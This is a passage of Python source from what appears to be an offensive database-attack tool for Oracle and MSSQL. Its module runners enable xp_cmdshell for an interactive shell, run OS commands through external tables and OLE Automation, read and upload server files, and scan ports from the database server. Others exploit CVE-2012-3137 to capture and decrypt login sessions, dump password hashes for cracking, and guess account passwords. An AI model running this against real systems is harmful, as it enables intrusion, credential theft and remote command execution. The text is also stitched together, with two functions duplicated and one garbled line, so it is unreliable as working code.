            # The module cannot confirm execution, hence "(normally)" in the message.
            out.goodNews("The {0} command stored in {1} has been executed (normally)".format(execSpec[1], execSpec[0]))
def runUnwrapperModule(args):
    '''
    Run the unwrapper module.

    Options read from *args*: "test-module" (self-test on a non-connected
    Unwrapper), "file" (unwrap a local file with an offline Unwrapper) and
    "object-name" (unwrap a remote object of type "object-type" with a
    connected Unwrapper). Returns EXIT_MISS_ARGUMENT when none of the three
    options was given or checkOptionsGivenByTheUser rejects the option set;
    otherwise returns None.
    '''
    if args['test-module'] == False and args['object-name'] == None and args['file'] == None:
        logging.critical("You must choose --test-module or/and --object-name or/and --file")
        return EXIT_MISS_ARGUMENT
    out = args['print']
    if args['test-module'] == True:
        out.title("Test if the Unwrapper module can be used")
        Unwrapper(args, offline=False).testAll()
    if args['file'] is not None:
        unwrapper = Unwrapper(args, offline=True)
    if args['object-name'] is not None:
        if checkOptionsGivenByTheUser(args, ["test-module", "object-name"]) == False:
            return EXIT_MISS_ARGUMENT
        # With both --file and --object-name given, this connected instance
        # replaces the offline one and serves both unwrap calls below.
        unwrapper = Unwrapper(args, offline=False)
        unwrapper.connection(stopIfError=True)
        out.title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name']))
        code = unwrapper.unwrapRemotely(args['object-name'], objectType=args['object-type'])
        if code is None:
            out.badNews("Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...")
        else:
            out.goodNews(code)
    if args['file'] is not None:
        out.title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file']))
        code = unwrapper.unwrapLocally(args['file'])
        if code is None:
            out.badNews("Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...")
        else:
            out.goodNews(code)
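def runExternalTableModule(args):
    """
    Run the External Table module.

    Options read from *args*: "test-module" (self-test), "getFile" (a
    (remotePath, remoteNameFile, localFile) triple handed to
    ExternalTable.getFile; the content is printed) and "exec" (a
    (remotePath, remoteNameFile) pair handed to ExternalTable.execute).
    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the
    given option set; otherwise returns None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    externalTable = ExternalTable(args)
    externalTable.connection(stopIfError=True)
    if args["test-module"] == True:
        args["print"].title("Test if the External Table module can be used")
        externalTable.testAll()
    # Option 1: getFile
    if args["getFile"] != None:
        args["print"].title("Read the {0} file stored in the {1} path".format(args["getFile"][1], args["getFile"][0]))
        data = externalTable.getFile(
            remotePath=args["getFile"][0], remoteNameFile=args["getFile"][1], localFile=args["getFile"][2]
        )
        if isinstance(data, Exception):
            args["print"].badNews("There is an error: {0}".format(data))
        else:
            args["print"].goodNews(
                "Data stored in the remote file {0} stored in {1}".format(args["getFile"][1], args["getFile"][0])
            )
            # Function-call form: the Python 2 'print data' statement is a
            # SyntaxError on Python 3 and prints the same on Python 2.
            print(data)
    # Option 2: exec a script or command
    if args["exec"] != None:
        args["print"].title("Execute the {0} command stored in the {1} path".format(args["exec"][1], args["exec"][0]))
        data = externalTable.execute(remotePath=args["exec"][0], remoteNameFile=args["exec"][1])
        if isinstance(data, Exception):
            args["print"].badNews("There is an error: {0}".format(data))
        else:
            # The module cannot confirm execution, hence "(normally)".
            args["print"].goodNews(
                "The {0} command stored in {1} has been executed (normally)".format(args["exec"][1], args["exec"][0])
            )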
def runDbmsadvisorModule(args):
    '''
    Run the DBMSAdvisor module.

    Options read from *args*: "test-module" (self-test) and "putFile", a
    (remotePath, remoteName, localFile) triple uploaded through
    DbmsAdvisor.putFile. Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    advisor = DbmsAdvisor(args)
    advisor.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the DBMSAdvisor library can be used")
        advisor.testAll()
    # Option 1: putLocalFile
    spec = args['putFile']
    if spec is not None:
        remotePath, remoteName, localFile = spec[0], spec[1], spec[2]
        out.title("Put the {0} local file in the {1} path (named {2}) of the {3} server".format(remotePath and localFile, remotePath, remoteName, args['server']) if False else
                  "Put the {0} local file in the {1} path (named {2}) of the {3} server".format(localFile, remotePath, remoteName, args['server']))
        uploaded = advisor.putFile(remotePath, remoteName, localFile=localFile)
        if uploaded == True:
            out.goodNews("The {0} local file was put in the remote {1} path (named {2})".format(localFile, remotePath, remoteName))
        else:
            out.badNews("The {0} local file was not put in the remote {1} path (named {2}): {3}".format(localFile, remotePath, remoteName, str(uploaded)))
    advisor.close()
def runOleAutomationModule(args):
    '''
    Run the OleAutomation module.

    Options read from *args*: "enable-ole-automation", "read-file",
    "write-file" ((file, data) pair), "get-file" ((remote, local) pair),
    "put-file" ((local, remote) pair), "exec-sys-cmd" and
    "disable-ole-automation"; "test-module" runs the self-test first. The
    options are processed in that order, so enable/disable may bracket the
    other actions. Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser
    rejects the given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["read-file", "write-file", "get-file", "put-file", "exec-sys-cmd", "enable-ole-automation", "disable-ole-automation"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    ole = OleAutomation(args)
    ole.connect()
    if args["test-module"] == True:
        ole.testAll()
    if args["enable-ole-automation"] == True:
        out.title("Try to enable OLE Automation")
        outcome = ole.enableOLEAutomationProcedures()
        if isinstance(outcome, Exception):
            out.badNews("Impossible to enable OLE Automation: '{0}'".format(outcome))
        else:
            out.goodNews("OLE Automation is enabled")
    readSpec = args["read-file"]
    if readSpec is not None:
        out.title("Try to read the remote file {0}".format(readSpec[0]))
        content = ole.readFile(readSpec[0])
        if isinstance(content, Exception):
            out.badNews("The file can't be read: '{0}'".format(content))
        else:
            out.goodNews("Data in the file {0}:\n{1}".format(readSpec[0], content))
    writeSpec = args["write-file"]
    if writeSpec is not None:
        out.title("Try to write this data on the remote file {0}: '{1}'".format(writeSpec[0], writeSpec[1]))
        outcome = ole.writeFile(writeSpec[0], writeSpec[1])
        if isinstance(outcome, Exception):
            out.badNews("Data cannot be written: '{0}'".format(outcome))
        else:
            out.goodNews("Data has been written in the file {0}".format(writeSpec[0]))
    getSpec = args["get-file"]
    if getSpec is not None:
        out.title("Try to copy the remote file {0} to {1}".format(getSpec[0], getSpec[1]))
        outcome = ole.getFile(getSpec[0], getSpec[1])
        if outcome == True:
            out.goodNews("The remote file {0} has been copied in {1}".format(getSpec[0], getSpec[1]))
        else:
            out.badNews("Impossible to get the remote file {0}: '{1}'".format(getSpec[0], outcome))
    putSpec = args["put-file"]
    if putSpec is not None:
        out.title("Try to copy the local file {0} to {1}".format(putSpec[0], putSpec[1]))
        outcome = ole.putFile(putSpec[0], putSpec[1])
        if outcome == True:
            out.goodNews("The local file {0} has been copied in {1}".format(putSpec[0], putSpec[1]))
        else:
            out.badNews("Impossible to put the local file {0} to {1}: '{2}'".format(putSpec[0], putSpec[1], outcome))
    cmdSpec = args["exec-sys-cmd"]
    if cmdSpec is not None:
        out.title("Try to execute a Windows system command: '{0}'".format(cmdSpec[0]))
        # wait=True: executeSysCmd returns only once the command has completed.
        outcome = ole.executeSysCmd(cmdSpec[0], wait=True)
        if outcome == True:
            out.goodNews("The system command has been executed on the remote server")
        else:
            out.badNews("Impossible to execute the Windows system command: {0}".format(outcome))
    if args["disable-ole-automation"] == True:
        out.title("Try to disable OLE Automation")
        outcome = ole.disableOLEAutomationProcedures()
        if isinstance(outcome, Exception):
            out.badNews("Impossible to disable OLE Automation: '{0}'".format(outcome))
        else:
            out.goodNews("OLE Automation is disabled")
    ole.closeConnection()
def runUtlHttpModule(args):
    '''
    Run the UTL_HTTP module (Oracle).

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as the title/goodNews/badNews reporter.  Handled
    options: test-module, send (request read from a file and replayed by
    UtlHttp.sendRequest) and scan-ports (TCP scan run by the database
    server through UtlHttp.scanTcpPorts).

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    -1 when the port specification of scan-ports cannot be parsed (the
    connection is then left to UtlHttp, as in the original), otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "scan-ports", "send"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    utlHttp = UtlHttp(args)
    status = utlHttp.connection(stopIfError=True)
    utlHttp.setTimeout(5)  # unit not visible here; presumably seconds — confirm in UtlHttp
    if args['test-module'] == True:
        out.title("Test if the UTL_HTTP library can be used")
        status = utlHttp.testAll()
    # Option 1: sendRequest
    sendOpt = args['send']
    if sendOpt != None:
        out.title("Send the HTTP request stored in the {0} file".format(sendOpt[2]))
        response = utlHttp.sendRequest(sendOpt[0], sendOpt[1], sendOpt[2])
        if isinstance(response, Exception):
            out.badNews("Impossible to send the request: {0}".format(response))
        else:
            out.goodNews("Response from the server:\n{0}".format(response))
    # Option 2: scan-ports
    scanOpt = args['scan-ports']
    if scanOpt != None:
        target, portSpec = scanOpt[0], scanOpt[1]
        ports = []
        if "," in portSpec:
            # explicit list, e.g. "80,443"
            ports = portSpec.split(',')
        elif '-' in portSpec:
            # range "a-b"; range() excludes b, so the upper bound itself is
            # not scanned — kept exactly as in the original.
            bounds = portSpec.split('-')
            ports = [str(p) for p in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        resultats = utlHttp.scanTcpPorts(httpObject=utlHttp, ip=target, ports=ports)
        utlHttp.printScanPortResults(resultats)
    utlHttp.close()
def runHttpUriTypeModule(args):
    '''
    Run the HTTPURITYPE module (Oracle).

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter.  Handled options: test-module, httpUrl
    (GET request issued by the database server via
    HttpUriType.sendGetRequest; the answer is also saved to
    ``args['outputFile']`` when that option is set) and scan-ports (TCP scan
    through HttpUriType.scanTcpPorts).

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    -1 when the port specification cannot be parsed, otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    httpUriType = HttpUriType(args)
    status = httpUriType.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the HTTPURITYPE library can be used")
        status = httpUriType.testAll()
    # Option 1: httpUrl
    url = args['httpUrl']
    if url != None:
        out.title("Send a GET request from {0} to {1}".format(args['connectionStr'], url))
        response = httpUriType.sendGetRequest(url=url)
        if isinstance(response, Exception):
            out.badNews("HTTP GET request failed")
        else:
            out.goodNews("The server response is:\n {0}".format(response))
            # NOTE(review): the flattened original does not show whether this
            # write also ran on failure; it is placed on the success path.
            if args['outputFile'] != None:
                httpUriType.writeFile(args['outputFile'], str(response))
    # Option 2: scan-ports
    scanOpt = args['scan-ports']
    if scanOpt != None:
        target, portSpec = scanOpt[0], scanOpt[1]
        ports = []
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            # range() excludes the upper bound, as in the original
            bounds = portSpec.split('-')
            ports = [str(p) for p in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        resultats = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=target, ports=ports)
        httpUriType.printScanPortResults(resultats)
    httpUriType.close()
def runXpCmdShellModule(args):
    '''
    Run the XpCmdShell module (MSSQL).

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter.  Handled options: test-module, put-file
    LOCAL REMOTE WIDTH (Xpcmdshell.uploadFileWithPowershell), enable-xpcmdshell,
    shell (Xpcmdshell.getInteractiveShell) and disable-xpcmdshell.  Disabling
    is only attempted when the enable step, if requested, returned True.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    enableOk = True  # stays True when --enable-xpcmdshell is not requested
    moduleOptions = ["test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell", "put-file"]
    if checkOptionsGivenByTheUser(args, moduleOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    xp = Xpcmdshell(args)
    xp.connect()
    if args["test-module"] == True:
        xp.testAll()
    if args["put-file"] != None:
        localPath, remotePath = args['put-file'][0], args['put-file'][1]
        out.title("Try to copy the local file {0} to {1} with powershell".format(localPath, remotePath))
        outcome = xp.uploadFileWithPowershell(localPath, remotePath, width=int(args['put-file'][2]))
        if outcome == True:
            out.goodNews("The local file {0} has been copied in {1}".format(localPath, remotePath))
        else:
            out.badNews("Impossible to put the local file {0} to {1}: '{2}'".format(localPath, remotePath, outcome))
    if args["enable-xpcmdshell"] == True:
        out.title("Re-enable Xpcmdshell")
        enableOk = xp.enableXpcmdshell()
        if enableOk == True:
            out.goodNews("Xpcmdshell is re-enabled")
        else:
            out.badNews("Xpcmdshell is NOT re-enabled")
    if args["shell"] == True:
        out.title("Trying to get a shell thanks to xpcmdshell")
        outcome = xp.getInteractiveShell()
        if outcome == True:
            out.goodNews("Good Bye :)")
        else:
            out.badNews("Impossible to get a shell on the database")
    if args["disable-xpcmdshell"] == True and enableOk == True:
        out.title("Disable Xpcmdshell")
        outcome = xp.disableXpcmdshell()
        if outcome == True:
            out.goodNews("Xpcmdshell is disabled")
        else:
            out.badNews("Xpcmdshell is NOT disabled: {0}".format(outcome))
    xp.closeConnection()
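def runCVE20123137Module(args):
    '''
    Run the CVE_2012_3137 module (Oracle).

    Handled options:
      * test-module        -> CVE_2012_3137.testAll()
      * get-all-passwords  -> requires root (geteuid() == 0); collects keys
                              with getPasswords()/getKeys() and saves them to
                              a ``sessions-<server>-<port>-<sid>`` file in the
                              current directory
      * decrypt-sessions A B -> CVE_2012_3137.decryptKeys(A, B); each
                              (account, password) pair found is printed

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter; ``args['user-list']`` and
    ``args['timeSleep']`` are handed to the module constructor.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    cve = CVE_2012_3137(args, accountsFile=args['user-list'], timeSleep=args['timeSleep'])
    if args['test-module'] == True:
        cve.testAll()
    # Option 1: get all passwords
    if args['get-all-passwords'] != None:
        # The original had a bare `print` here (a Python 2 print statement
        # that is a no-op expression under Python 3); it is dropped.
        if geteuid() != 0:
            out.badNews("Sorry, you need to run this as root because I need to sniff authentications to the database")
        else:
            out.title("Getting remote passwords on the {0} server, port {1}".format(args['server'], args['port']))
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                out.goodNews("Here are keys:\n\n{0}".format('\n'.join(keys)))
                filename = "sessions-{0}-{1}-{2}{3}".format(args['server'], args['port'], args['sid'], CHALLENGE_EXT_FILE)
                # `with` closes the file even when write() fails; the original
                # left it open on error.  The file holds captured authentication
                # material — treat it as sensitive data.
                with open(filename, "w") as fh:
                    fh.write('\n'.join(keys))
                out.goodNews("Sessions strored in the {0} file.".format(filename))
            else:
                out.badNews("Impossible to exploit this vulnreability")
    # Option 2: decrypt sessions
    if args['decrypt-sessions'] != None:
        sessionsFile, secondArg = args['decrypt-sessions'][0], args['decrypt-sessions'][1]
        out.title("Decrypt sessions stored in {0} via {1}".format(sessionsFile, secondArg))
        passwds = cve.decryptKeys(sessionsFile, secondArg)
        if passwds != []:
            # one "account:password" line per pair, trailing newline kept
            passwordsStr = "".join('{0}:{1}\n'.format(e[0], e[1]) for e in passwds)
            out.goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            out.badNews("No password has been found")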
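def runXpDirectoryModule(args):
    '''
    Run the XpDirectory module (MSSQL): file-system enumeration through the
    xp_dirtree / xp_subdirs / xp_fixeddrives / xp_availablemedia /
    xp_fileexist / xp_create_subdir extended procedures wrapped by XpDirectory.

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter.  Every option result is either an
    Exception (reported with badNews) or the data to display.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    moduleOptions = ['list-files', 'list-dir', 'list-fixed-drives',
                     'list-available-media', 'file-exists', 'create-dir']
    if checkOptionsGivenByTheUser(args, moduleOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    xpDir = XpDirectory(args)
    xpDir.connect()
    if args["test-module"] == True:
        xpDir.testAll()
    if args["list-files"] != None:
        path = args["list-files"][0]
        out.title("Try to list files stored in {0}".format(path))
        result = xpDir.listFilesViaXpDirtree(path)
        if isinstance(result, Exception):
            out.badNews("Impossible to list files stored in {0}: {1}".format(path, result))
        else:
            out.goodNews("Files stored in {0}:\n{1}".format(path, result))
    if args["list-dir"] != None:
        path = args["list-dir"][0]
        out.title("Try to list directories stored in {0}".format(path))
        result = xpDir.listDirectoriesViaXpSubdirs(path)
        # messages said "files" although this option lists directories
        if isinstance(result, Exception):
            out.badNews("Impossible to list directories stored in {0}: {1}".format(path, result))
        else:
            out.goodNews("Directories stored in {0}:\n{1}".format(path, result))
    if args["list-fixed-drives"] == True:
        # title said "xp_subdirs" although the module method is ...ViaXpFixedDrives
        out.title("Try to list drives with xp_fixeddrives")
        result = xpDir.listDrivesViaXpFixedDrives()
        if isinstance(result, Exception):
            # was "{1}" with a single format argument -> IndexError on this path
            out.badNews("Impossible to list drives with xp_fixeddrives: {0}".format(result))
        else:
            out.goodNews("Drives:\n{0}".format(result))
    if args["list-available-media"] == True:
        out.title("Try to list medias with xp_availablemedia")
        result = xpDir.listDrivesViaXpAvailableMedia()
        if isinstance(result, Exception):
            # same "{1}" IndexError as above
            out.badNews("Impossible to list drives with xp_availablemedia: {0}".format(result))
        else:
            out.goodNews("Medias:\n{0}".format(result))
    if args["file-exists"] != None:
        path = args["file-exists"][0]
        out.title("Try to check if the file {0} exists".format(path))
        result = xpDir.isFileExistViaXpFileexist(path)
        if isinstance(result, Exception):
            out.badNews("Impossible to know if the file {0} exists: {1}".format(path, result))
        else:
            out.goodNews("{1}".format(path, result))
    if args["create-dir"] != None:
        path = args["create-dir"][0]
        out.title("Try to create the folder {0}".format(path))
        result = xpDir.createSubDiViaXpCreateSubdir(path)
        if isinstance(result, Exception):
            out.badNews("Impossible to create the folder {0}: {1}".format(path, result))
        else:
            out.goodNews("The folder {0} has been created".format(path))
    xpDir.closeConnection()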
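def runCVE20123137Module(args):
    '''
    Run the CVE_2012_3137 module (Oracle).

    Handled options:
      * test-module        -> CVE_2012_3137.testAll()
      * get-all-passwords  -> requires root (geteuid() == 0); collects keys
                              with getPasswords()/getKeys() and saves them to
                              a ``sessions-<server>-<port>-<sid>`` file in the
                              current directory
      * decrypt-sessions A B -> CVE_2012_3137.decryptKeys(A, B); each
                              (account, password) pair found is printed

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter; ``args['user-list']`` and
    ``args['timeSleep']`` are handed to the module constructor.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    out = args["print"]
    cve = CVE_2012_3137(args, accountsFile=args["user-list"], timeSleep=args["timeSleep"])
    if args["test-module"] == True:
        cve.testAll()
    # Option 1: get all passwords
    if args["get-all-passwords"] != None:
        # The original had a bare `print` here (a Python 2 print statement
        # that is a no-op expression under Python 3); it is dropped.
        if geteuid() != 0:
            out.badNews("Sorry, you need to run this as root because I need to sniff authentications to the database")
        else:
            out.title("Getting remote passwords on the {0} server, port {1}".format(args["server"], args["port"]))
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                out.goodNews("Here are keys:\n\n{0}".format("\n".join(keys)))
                filename = "sessions-{0}-{1}-{2}{3}".format(args["server"], args["port"], args["sid"], CHALLENGE_EXT_FILE)
                # `with` closes the file even when write() fails; the original
                # left it open on error.  The file holds captured authentication
                # material — treat it as sensitive data.
                with open(filename, "w") as fh:
                    fh.write("\n".join(keys))
                out.goodNews("Sessions strored in the {0} file.".format(filename))
            else:
                out.badNews("Impossible to exploit this vulnreability")
    # Option 2: decrypt sessions
    if args["decrypt-sessions"] != None:
        sessionsFile, secondArg = args["decrypt-sessions"][0], args["decrypt-sessions"][1]
        out.title("Decrypt sessions stored in {0} via {1}".format(sessionsFile, secondArg))
        passwds = cve.decryptKeys(sessionsFile, secondArg)
        if passwds != []:
            # one "account:password" line per pair, trailing newline kept
            passwordsStr = "".join("{0}:{1}\n".format(e[0], e[1]) for e in passwds)
            out.goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            out.badNews("No password has been found")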
def runPasswordGuesserModule(args):
    '''
    Run the PasswordGuesser module.

    With ``args['hostlist']`` set, the (host, port) pairs returned by
    getHostsFromFile are written one at a time into ``args['host']`` /
    ``args['port']`` (the mapping is mutated) and
    runPasswordGuesserModuleOnAHost is called for each; otherwise the single
    target already in ``args`` is used.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the
    given options, otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["search"], checkAccount=False, allowHostsFile=True) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    if args['hostlist'] == None:
        out.title("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port']))
        runPasswordGuesserModuleOnAHost(args)
        return
    hosts = getHostsFromFile(args['hostlist'])
    out.title("Searching valid accounts on these targets: {0}".format(hosts))
    for target in hosts:
        args['host'], args['port'] = target[0], target[1]
        out.subtitle("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port']))
        runPasswordGuesserModuleOnAHost(args)
def runHttpUriTypeModule(args):
    '''
    Run the HTTPURITYPE module (Oracle).

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter.  Handled options: test-module, httpUrl
    (GET request issued by the database server via
    HttpUriType.sendGetRequest; the answer is also saved to
    ``args['outputFile']`` when that option is set) and scan-ports (TCP scan
    through HttpUriType.scanTcpPorts).

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    -1 when the port specification cannot be parsed, otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args["print"]
    httpUriType = HttpUriType(args)
    status = httpUriType.connection(stopIfError=True)
    if args["test-module"] == True:
        out.title("Test if the HTTPURITYPE library can be used")
        status = httpUriType.testAll()
    # Option 1: httpUrl
    url = args["httpUrl"]
    if url != None:
        out.title("Send a GET request from {0} to {1}".format(args["connectionStr"], url))
        response = httpUriType.sendGetRequest(url=url)
        if isinstance(response, Exception):
            out.badNews("HTTP GET request failed")
        else:
            out.goodNews("The server response is:\n {0}".format(response))
            # NOTE(review): the flattened original does not show whether this
            # write also ran on failure; it is placed on the success path.
            if args["outputFile"] != None:
                httpUriType.writeFile(args["outputFile"], str(response))
    # Option 2: scan-ports
    scanOpt = args["scan-ports"]
    if scanOpt != None:
        target, portSpec = scanOpt[0], scanOpt[1]
        ports = []
        if "," in portSpec:
            ports = portSpec.split(",")
        elif "-" in portSpec:
            # range() excludes the upper bound, as in the original
            bounds = portSpec.split("-")
            ports = [str(p) for p in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        resultats = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=target, ports=ports)
        httpUriType.printScanPortResults(resultats)
    httpUriType.close()
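def runPasswordsModule(args):
    '''
    Run the Passwords module (Oracle): retrieve the hashed passwords of
    database accounts.

    Handled options: test-module, get-passwords (all accounts, locked ones
    included), get-passwords-not-locked (accounts returned by
    Passwords.__getLockedUsernames__ are excluded) and
    get-passwords-from-history.  The first two print the result twice, in
    the module's own layout (printPasswords) and in the 10g oclHashcat
    layout (printPasswordsOclHashcat); the history option prints once.  An
    Info object is built and stored in ``args['info']`` when the caller did
    not provide one.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    moduleOptions = ["test-module", "get-passwords", "get-passwords-from-history", "get-passwords-not-locked"]
    if checkOptionsGivenByTheUser(args, moduleOptions) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    passwords = Passwords(args)
    status = passwords.connection(stopIfError=True)
    # Result unused; the call is kept because the original issued it right
    # after connecting — TODO confirm whether Passwords relies on a side effect.
    passwords.__getLockedUsernames__()
    # dict.has_key() does not exist in Python 3; `in` is the equivalent test
    # (assumes args is a dict or supports __contains__).
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        out.title("Test if hashed passwords can be got")
        status = passwords.testAll()
    if args['get-passwords'] == True:
        out.title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        if status == True:
            out.goodNews("Here are Oracle hashed passwords (some accounts can be locked):")
            passwords.printPasswords()
            out.goodNews("Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):")
            passwords.printPasswordsOclHashcat()
        else:
            out.badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-not-locked'] == True:
        out.title("Try to get Oracle hashed passwords when the account is not locked")
        blacklistOfUsernames = passwords.__getLockedUsernames__()
        status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames)
        if status == True:
            out.goodNews("Here are Oracle hashed passwords (all accounts are opened, not locked):")
            passwords.printPasswords()
            out.goodNews("Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):")
            passwords.printPasswordsOclHashcat()
        else:
            out.badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        out.title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            out.goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            out.badNews("Impossible to get hashed passwords from history: {0}".format(status))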
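def runMssqlInfoModule(args):
    '''
    Run the MssqlInfo module: fingerprint the SQL Server at
    ``args['host']``:``args['port']`` (checkAccount=False, so no account is
    required by the option check).

    With get-max-info the version is first requested through the TDS
    response (MssqlInfo.__getRemoteVersionThroughTDSResponse__, a dict that
    is expected to carry 'Version' and 'ProductName'), then the SQL Server
    Browser service is queried (__getRemoteVersionThroughSQLServerBrowser__);
    an empty dict from the latter is reported as the service being disabled.

    Returns EXIT_MISS_ARGUMENT when get-max-info is absent, otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["get-max-info"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    if args['get-max-info'] == True:
        out = args['print']
        host, port = args['host'], args['port']
        mssqlInfo = MssqlInfo(args)
        productName = mssqlInfo.__getRemoteVersionThroughTDSResponse__()
        out.title("Try to get the remote database version thanks to the TDS protocol:")
        # dict.has_key() does not exist in Python 3; `in` is the equivalent test
        if 'Version' in productName and 'ProductName' in productName:
            out.goodNews("The SQL server version of {0}:{1}: {2} i.e. {3}".format(host, port, productName['Version'], productName['ProductName']))
        else:
            out.badNews("Impossible to get the remote database version thanks to the TDS protocol")
        out.title("Try to get information about the remote database thanks to SQL browser Server:")
        info = mssqlInfo.__getRemoteVersionThroughSQLServerBrowser__()
        if info == {}:
            out.badNews("SQL Server Browser is not enabled on the server {0}:{1}".format(host, port))
        else:
            out.goodNews("SQL Server Browser is enabled on the server {0}:{1}:\n{2}".format(host, port, mssqlInfo.returnPrintableStringFromDict(info)))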
def runTnsCmdModule(args):
    '''
    Run the TNS cmd module: query the Oracle listener at
    ``args['server']``:``args['port']`` (option check runs with
    checkSID=False and checkAccount=False).

    Handled options: ping (Tnscmd.getAlias; the aliases are suggested as SID
    candidates), version (Tnscmd.getVersion) and status
    (Tnscmd.getInformation(cmd='status'), raw answer shown via getRecvData).

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["version", "status", "ping"], checkSID=False, checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    tnscmd = Tnscmd(args)
    if args['ping'] == True:
        out.title("Searching ALIAS on the {0} server, port {1}".format(args['server'], args['port']))
        aliases = tnscmd.getAlias()
        out.goodNews("{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID.".format(len(aliases), aliases))
    if args['version'] == True:
        out.title("Searching the version of the Oracle database server ({0}) listening on the port {1}".format(args['server'], args['port']))
        remoteVersion = tnscmd.getVersion()
        out.goodNews("The remote database version is: '{0}'".format(remoteVersion))
    if args['status'] == True:
        out.title("Searching the server status of the Oracle database server ({0}) listening on the port {1}".format(args['server'], args['port']))
        tnscmd.getInformation(cmd='status')
        out.goodNews("Data received by the database server: '{0}'".format(tnscmd.getRecvData()))
def runSMBModule(args):
    '''
